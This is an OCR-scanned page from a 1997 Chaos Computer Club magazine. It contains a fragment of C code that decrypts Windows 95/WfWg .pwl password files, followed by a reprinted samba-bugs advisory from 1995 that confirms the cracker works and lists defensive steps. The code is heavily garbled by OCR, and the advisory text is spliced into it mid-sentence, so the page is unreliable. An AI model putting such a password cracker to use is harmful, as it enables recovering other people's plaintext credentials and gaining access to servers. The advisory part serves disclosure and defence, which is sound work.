Chaos Computer Club 1997 February

home *** CD-ROM | disk | FTP | other *** search

/ Chaos Computer Club 1997 February / cccd_beta_feb_97.iso / chaos / ds54 / ds54_15.txt < prev next >

Wrap

Text File | 1997-02-28 | 4KB | 173 lines

Seite 14 Ausgabe 54 cracked=size-OxO208; if(crackedcO) cracked=O; if(cracked>1000) cracked=1000; memcpy(keystream,Data+Ox208,cracked ); /* generate 20 bytes of keystream */ for(i=O;ic20;i++) ( ch=toupper(nameti]); if(ch=O) break; if(ch_'.') break; keystreamlilA=ch; ); cracked=20; /* find allocated resources ./ sizemask-keystream[O]+(keystream[1 ]cc8); printf(~S~zemask: %04X\n",sizemask); } for(i=O;ic256; i++) Rall[i]=O; maxr-O, for(i-Ox108;kOx208;i++) ( if(Data[i]l=Oxtf) ~ Rall[Data[i]]++; if (Data~i]>maxr) maxr=Data[i]; maxr=(((maxr/16)+1)~16); /* resource pointertable size appears to be divisible by 16 ./ /* search after resources */ Rpoint[0]=OxO208+2ämaxr+20+2; /* first resource ./ for(i-O;i<maxr;i++) ~ w find size ot current resource */ pos-Rpoint[i]; rsz=Data[pos]+(Datalpos+1 ]cc8); rsz^=sizemask; printf("Analyzing block with size: %04x\t(%d:%d)\n", rsz, I, Rall[i]); if( (Rall[i]==O) && (rszl=O) ) } printf("unused resource has nonzero size !!I\n"); exit(O); pos+=rsz; ~tc ~hicn~c~k~er - Das wissenschaftliche Fachblatt fUr Datenreisende Aus~abe 54 v Seite 15 1. Resources have a tendency to have the wrong size for some reason */ check for correct size W/ if(lcmaxr-1 ) ~ while(Data[pos+3]!=keystreaml1]) { prinff(~:(%O2X).,Dala[pos+3]); pos+=3D2; /. very rude may tail */ } pos+=2; /* include pointer in size öl Rpointpl+1 ]=pos; Rpoint[maxr]-size; w insert Table data inlo keystream */ for(i=O;i <= maxr;i++) ~ keystrearn[20+2*ip=Rpdnt[i] & OxOOff; keystream[21+2äll~(Rpoint[i] >> 8) & OxOOff; cracked+=maxr.2+2: It means that anyone with access to a WfWg or Win95 box that has been used to login to a samba (or NT or OS12 etc) server can take the .pwl files off the PC and use them to get valid passwords on the server. Note that this is not directly a secur ty hole in samba. Its a huge security hole in the way WfWg and Win95 store their pas- swords on disk. It equally affects networks which use NT and OS/2 server. It also affects people who just use other WfWg and Win95 machines as servers. pfinff("%d bytes of keyslream recovererl\n~,cracked); Also, if your WfWg and Win95 systems /* decrypt resouroes */ for(i=O;i c maxr;i++) { rsz=Rpointli+1 ]-Rpoint[il; if (rsz>cracked) rsz=cracked; pfinff("Resource[°/Odl (°/Od)\n~,i,rsz); forU=o;lcrsz;i++) = prlnff(''%c~,Dala[Rpoint[il+jl~keystream[j]); pfinff(~\n~); exit(0); } - --- end --- From: samba-bugs@anu.edu.au Subject: win95 and WfWg .pwl files cracked Date: Tue, 5 Dec 1995 23:11:52 +1100 1 have just tried Frank Stevensons program for cracking .pwl files. It indeed works. With it I could obtain the plain text passwords from a Windows95 .pwl file or a windows for workgroups .pwl fHe in less than a second. I tried it on 3 different files. A11 were successtully decrypted. This is very bad. have not been patched to avoid the "cd .1" bug and you export any shares then anyone who can attach to those shares can obtain your .pwl files. It doesn't mat- ter what directory you are exporting. What can you do about this? Well, if you don't care about security then just do nothing :-) Otherwise. First of all, change your router rules to disable tcpl39, udpl37 and udpl38 from entering your network from the Internet. Secondly, disable your WfWG and Win95 boxes from saving passwords on disk when connecting to SMB servers. Can someone please post clear instructions on exactly how to do this? (preferably with how to make it permanent) Thirdly, delete all the .pwl f~les on your WfWG and Win95 boxes. Theres probably more you should do. I only found out about this decryption pro- gram a few minutes a~o. I imagine more advice will be forthcoming from other people on this list. Andrew ~k ~stal~lolItr - Das wissenschaftliche Fachblatt für Datenreisende. l